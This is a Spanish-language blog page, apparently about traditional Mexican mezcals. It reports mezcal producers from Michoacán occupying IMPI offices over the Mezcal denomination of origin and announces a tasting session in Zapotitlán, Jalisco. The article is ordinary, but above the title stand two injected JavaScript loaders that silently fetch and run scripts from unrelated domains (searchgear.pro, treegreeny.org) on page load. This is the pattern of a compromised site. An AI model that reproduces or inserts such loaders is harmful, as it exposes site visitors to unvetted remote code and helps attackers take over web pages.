;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Mezcales Tradicionales de los Pueblos de México » 109. Defensa y ejercicio de derechos humanos, culturales y constitucionales

109. Defensa y ejercicio de derechos humanos, culturales y constitucionales


Maestros Vinateros toman el IMPII. El miércoles pasado, 120 productores michoacanos de mezcal procedentes de 20 municipios, tomaron las oficinas del Instituto Mexicano de la Propiedad Industrial (IMPI) profundamente molestos por la falta de respuesta a la solicitud que, desde enero de 2006, fue presentada para que la zona protegida por la Denominación de Origen Mezcal fuera ampliada a Michoacán; falta que constituye una de las muchas violaciones a la normatividad que el mismo IMPI ha cometido. Resultado de la acción fue el compromiso del Director General del instituto de dar una resolución antes del 31 de enero.
La respuesta tendrá que ser: congruente con la Declaratoria de la Gastronomía Tradicional de México como Patrimonio Cultural Inmaterial (PCI) de la Humanidad, cuyo caso ejemplar fue el de ¡la gastronomía de Michoacán!; congruente con los derechos culturales -que son derechos humanos- garantizados para todos los mexicanos por la Constitución, y congruente con el conocimiento tradicional y científico -social y natural- que actualmente tenemos en México sobre nuestra tradición mezcalera.
Y ya es hora de que el IMPI someta a discusión pública las aberrantes Denominaciones de Origen de Tequila, Mezcal y Bacanora, que en vez de proteger las bebidas, promueven su adulteración y destrucción.
II. Mañana se llevará a cabo la “Tercera Sesión de Trabajo Sensorial de Mezcales del sur de Jalisco” en Zapotitlán, de 11 a 16 horas, en la Casa de Cultura. La convocaron los maestros taberneros, el presidente municipal de la población y la Logia de los Mezcólatras. Asistirán al menos 12 maestros taberneros (con sus respectivos MT), habitantes de la región, científicos, ciudadanos y restauranteros de Jalisco, todos interesados y comprometidos con la preservación de su PCI.
El evento será un espacio para reflexionar sobre la necesidad de revalorar y conservar el PCI que representan los mezcales tradicionales (MT), y buscar opciones a nivel municipal, estatal y nacional que permitan defender y difundir esta rica tradición.

http://impreso.milenio.com/node/9091026

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *